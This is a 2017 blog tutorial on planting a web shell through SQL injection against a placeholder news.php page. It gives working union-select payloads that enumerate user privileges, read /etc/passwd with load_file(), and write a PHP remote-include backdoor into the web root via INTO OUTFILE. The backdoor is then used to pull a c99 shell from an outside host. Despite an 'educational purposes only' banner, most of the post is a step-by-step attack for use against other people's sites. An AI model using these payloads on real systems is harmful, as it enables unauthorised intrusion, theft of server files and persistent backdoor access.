Monday, June 5, 2017

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

 I Introduction
So today i'm gonna teach you how to upload shell using SQL Injection

 II Getting User
So first, get the user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

 www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

if the user is root or the user privilleges is Y or Yes then you're good go.

III Getting the Full Path Disclosure
I've written a tutorial how to get the Full Path Disclosure here.

Note : that if you can't get the Full Path Disclosure, there's no way you can upload your shell if you don't know where to save your backdoor shell.

Tips: Getting Full Path Disclosure

for some tips if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

or if you still can't try guessing the FPD. The commons are "/var/www/" ,"/var/www/sitename" and etc..

to make sure that they're correct try "/var/www/index.php" and visit www.website.com/index.php then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path disclosure, we can now try uploading the shell. We'll gonna use this script for our backdoor initiator:
<?php include $_GET["inc"];?>
www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
So once we visit that url, we will now go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And wollah! You have successfully inserted a php backdoor in the website!

if its 404 not found, then maybe the directory is not writable. You gotta find some directories that is writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.

V Goodbye
Hope you learned something with my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!
at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)